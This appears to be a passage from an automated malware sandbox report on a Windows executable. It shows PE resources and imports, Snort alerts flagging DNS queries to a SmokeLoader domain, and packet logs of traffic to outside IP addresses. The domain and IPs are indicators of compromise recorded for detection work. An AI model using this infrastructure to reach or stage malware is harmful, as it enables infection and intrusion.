.rsrc	0x1ee2000	0x13ce0	0x13e00	False	0.307328518081761	data	3.845146285396915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x1ef1ff8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_CURSOR	0x1ef2128	0xf0	Device independent bitmap graphic, 24 x 48 x 1, image size 0			0.44583333333333336
RT_CURSOR	0x1ef2218	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0			0.0877110694183865
RT_CURSOR	0x1ef32f0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4473684210526316
RT_CURSOR	0x1ef3420	0xf0	Device independent bitmap graphic, 24 x 48 x 1, image size 0			0.4625
RT_CURSOR	0x1ef3510	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0			0.08583489681050657
RT_CURSOR	0x1ef45e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3407039711191336
RT_ICON	0x1ee2850	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.441701244813278
RT_ICON	0x1ee2850	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.441701244813278
RT_ICON	0x1ee4df8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.48278688524590163
RT_ICON	0x1ee4df8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.48278688524590163
RT_ICON	0x1ee57a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.28171641791044777
RT_ICON	0x1ee57a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.28171641791044777
RT_ICON	0x1ee6650	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.38940092165898615
RT_ICON	0x1ee6650	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.38940092165898615
RT_ICON	0x1ee6d18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.3901734104046243
RT_ICON	0x1ee6d18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.3901734104046243
RT_ICON	0x1ee7280	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.22313278008298756
RT_ICON	0x1ee7280	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.22313278008298756
RT_ICON	0x1ee9828	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.2800187617260788
RT_ICON	0x1ee9828	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.2800187617260788
RT_ICON	0x1eea8d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.3012295081967213
RT_ICON	0x1eea8d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.3012295081967213
RT_ICON	0x1eeb258	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.33687943262411346
RT_ICON	0x1eeb258	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.33687943262411346
RT_ICON	0x1eeb728	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.30730277185501065
RT_ICON	0x1eeb728	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.30730277185501065
RT_ICON	0x1eec5d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.3722924187725632
RT_ICON	0x1eec5d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.3722924187725632
RT_ICON	0x1eece78	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.41244239631336405
RT_ICON	0x1eece78	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.41244239631336405
RT_ICON	0x1eed540	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.38078034682080925
RT_ICON	0x1eed540	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.38078034682080925
RT_ICON	0x1eedaa8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	India	0.23226141078838175
RT_ICON	0x1eedaa8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	Sri Lanka	0.23226141078838175
RT_ICON	0x1ef0050	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	India	0.26594746716697937
RT_ICON	0x1ef0050	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	Sri Lanka	0.26594746716697937
RT_ICON	0x1ef10f8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	India	0.2754098360655738
RT_ICON	0x1ef10f8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	Sri Lanka	0.2754098360655738
RT_ICON	0x1ef1a80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	India	0.3191489361702128
RT_ICON	0x1ef1a80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	Sri Lanka	0.3191489361702128
RT_STRING	0x1ef5120	0x380	data	Tamil	India	0.46651785714285715
RT_STRING	0x1ef5120	0x380	data	Tamil	Sri Lanka	0.46651785714285715
RT_STRING	0x1ef54a0	0xe8	data	Tamil	India	0.5646551724137931
RT_STRING	0x1ef54a0	0xe8	data	Tamil	Sri Lanka	0.5646551724137931
RT_STRING	0x1ef5588	0xe4	data	Tamil	India	0.5745614035087719
RT_STRING	0x1ef5588	0xe4	data	Tamil	Sri Lanka	0.5745614035087719
RT_STRING	0x1ef5670	0x386	Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0	Tamil	India	0.46008869179600886
RT_STRING	0x1ef5670	0x386	Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0	Tamil	Sri Lanka	0.46008869179600886
RT_STRING	0x1ef59f8	0x2e4	data	Tamil	India	0.4689189189189189
RT_STRING	0x1ef59f8	0x2e4	data	Tamil	Sri Lanka	0.4689189189189189
RT_ACCELERATOR	0x1ef1f60	0x68	data	Tamil	India	0.7403846153846154
RT_ACCELERATOR	0x1ef1f60	0x68	data	Tamil	Sri Lanka	0.7403846153846154
RT_GROUP_CURSOR	0x1ef4e90	0x14	data			1.25
RT_GROUP_CURSOR	0x1ef32c0	0x30	data			1.0
RT_GROUP_CURSOR	0x1ef45b8	0x30	data			1.0
RT_GROUP_ICON	0x1ee5780	0x22	data	Tamil	India	0.9705882352941176
RT_GROUP_ICON	0x1ee5780	0x22	data	Tamil	Sri Lanka	0.9705882352941176
RT_GROUP_ICON	0x1eeb6c0	0x68	data	Tamil	India	0.7115384615384616
RT_GROUP_ICON	0x1eeb6c0	0x68	data	Tamil	Sri Lanka	0.7115384615384616
RT_GROUP_ICON	0x1ef1ee8	0x76	data	Tamil	India	0.6694915254237288
RT_GROUP_ICON	0x1ef1ee8	0x76	data	Tamil	Sri Lanka	0.6694915254237288
RT_VERSION	0x1ef4ea8	0x274	data			0.5382165605095541
None	0x1ef1fd8	0xa	data	Tamil	India	1.8
None	0x1ef1fd8	0xa	data	Tamil	Sri Lanka	1.8
None	0x1ef1fe8	0xa	data	Tamil	India	1.8
None	0x1ef1fe8	0xa	data	Tamil	Sri Lanka	1.8
None	0x1ef1fc8	0xa	data	Tamil	India	1.8
None	0x1ef1fc8	0xa	data	Tamil	Sri Lanka	1.8

Imports

DLL	Import
KERNEL32.dll	SetDefaultCommConfigA, SetInformationJobObject, AllocConsole, GetConsoleAliasExesLengthA, UpdateResourceA, MoveFileExW, InterlockedDecrement, WaitNamedPipeA, GetCurrentProcess, GetNamedPipeHandleStateA, HeapFree, GetProfileStringW, GetUserDefaultLCID, SetComputerNameW, GetComputerNameW, GetTimeFormatA, FlushConsoleInputBuffer, _lclose, _lcreat, GetModuleHandleW, GetConsoleAliasesLengthA, ReadConsoleW, GetWindowsDirectoryA, GetCompressedFileSizeW, GetConsoleAliasExesW, EnumTimeFormatsA, GetDriveTypeA, GlobalAlloc, GetPrivateProfileIntA, LoadLibraryW, TerminateThread, FatalAppExitW, _hread, GetPrivateProfileStructW, GetCalendarInfoW, DeleteVolumeMountPointW, GetFileAttributesA, TransactNamedPipe, GetFileSize, GetStartupInfoW, CreateMailslotW, VirtualUnlock, GetLastError, IsDBCSLeadByteEx, GetCurrentDirectoryW, SetLastError, BackupRead, ReadConsoleOutputCharacterA, GetProcAddress, VirtualAlloc, CreateNamedPipeA, MoveFileW, GlobalGetAtomNameA, OpenWaitableTimerA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, BuildCommDCBAndTimeoutsW, GetNumberFormatW, GetCurrentConsoleFont, EnumDateFormatsA, CreateIoCompletionPort, _lread, GetModuleHandleA, FreeEnvironmentStringsW, FindNextFileW, OpenSemaphoreW, SetFileShortNameA, ReadConsoleInputW, LocalSize, FindFirstVolumeW, DeleteFileW, EnumSystemLocalesW, DeleteFileA, CloseHandle, ReadFile, WriteConsoleW, GetConsoleAliasW, GetCommandLineW, LCMapStringW, FlushFileBuffers, InterlockedIncrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, MoveFileA, HeapAlloc, HeapReAlloc, GetCommandLineA, HeapSetInformation, RtlUnwind, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, ExitProcess, WriteFile, GetModuleFileNameW, SetFilePointer, HeapSize, RaiseException, GetModuleFileNameA, WideCharToMultiByte, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, MultiByteToWideChar, IsProcessorFeaturePresent, GetConsoleCP, GetConsoleMode, SetStdHandle, CreateFileW
USER32.dll	CharUpperA, CharUpperBuffA
ADVAPI32.dll	RevertToSelf
WINHTTP.dll	WinHttpGetProxyForUrl

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.48.8.8.851600532045695 07/27/23-20:18:39.261916	UDP	2045695	ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)	51600	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.860080532045695 07/27/23-20:18:45.048520	UDP	2045695	ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)	60080	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.864167532045695 07/27/23-20:18:54.999452	UDP	2045695	ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)	64167	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.858565532045695 07/27/23-20:18:57.477023	UDP	2045695	ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)	58565	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.856807532045695 07/27/23-20:18:59.101253	UDP	2045695	ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)	56807	53	192.168.2.4	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2023 20:18:39.334511042 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:39.350713968 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:39.351315022 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:39.384618044 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:39.384655952 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:39.400933981 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:39.400991917 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:39.488347054 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:39.488393068 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:39.488570929 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:39.497889996 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:39.497935057 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:39.514072895 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:39.514134884 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:39.581751108 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:39.581788063 CEST	80	49680	188.114.97.7	192.168.2.4
Jul 27, 2023 20:18:39.581959963 CEST	49680	80	192.168.2.4	188.114.97.7
Jul 27, 2023 20:18:39.908752918 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:40.184441090 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:40.184665918 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:40.184963942 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:40.660048008 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.227246046 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.227307081 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.227384090 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:41.505403996 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.505435944 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.505456924 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.505475998 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.505523920 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:41.505563974 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:41.780813932 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.780869007 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.780893087 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.780915022 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.780937910 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.780961037 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.780985117 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.781002998 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:41.781008005 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:41.781059980 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:41.781090975 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.056322098 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056416035 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056440115 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056468010 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056495905 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056519985 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056541920 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.056544065 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056570053 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056596994 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056627989 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056638956 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.056654930 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056668043 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.056683064 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056706905 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056730986 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.056734085 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056760073 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.056785107 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.100526094 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332015038 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332046032 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332122087 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332252026 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332315922 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332339048 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332357883 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332390070 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332415104 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332420111 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332433939 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332453966 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332468987 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332474947 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332495928 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332532883 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332539082 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332559109 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332575083 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332581043 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332601070 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332618952 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332619905 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332639933 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332659960 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332665920 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332679987 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332700014 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332701921 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332720041 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332740068 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332740068 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332761049 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332781076 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332782030 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332802057 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332820892 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332839966 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.332842112 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.332869053 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.376117945 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.376157999 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.376255989 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.607398033 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.607444048 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.607470036 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.607584000 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.607784986 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.607809067 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.607847929 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.607863903 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.607870102 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.607892036 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.607912064 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608071089 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608088970 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608110905 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608131886 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608145952 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608160019 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608161926 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608200073 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608218908 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608233929 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608254910 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608274937 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608294010 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608300924 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608305931 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608323097 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608342886 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608364105 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608392000 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608414888 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608418941 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608452082 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608465910 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608479977 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608500957 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608524084 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608545065 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608551979 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608575106 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608576059 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608598948 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608619928 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608627081 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608640909 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608661890 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608675003 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608683109 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608705044 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608709097 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608725071 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608746052 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608752012 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608766079 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608782053 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608786106 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608805895 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608827114 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608846903 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.608864069 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608876944 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608890057 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608910084 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608931065 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.608951092 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.651551962 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.651592016 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.651609898 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.651632071 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.651725054 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.694236040 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.882925987 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.882962942 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.882985115 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883094072 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.883136034 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883203983 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.883407116 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883433104 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883452892 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883474112 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883488894 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.883495092 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883514881 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883528948 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.883536100 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883558035 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883575916 CEST	49681	80	192.168.2.4	175.119.10.231
Jul 27, 2023 20:18:42.883601904 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883625031 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883661032 CEST	80	49681	175.119.10.231	192.168.2.4
Jul 27, 2023 20:18:42.883665085 CEST	49681	80	192.168.2.4	175.119.10.231
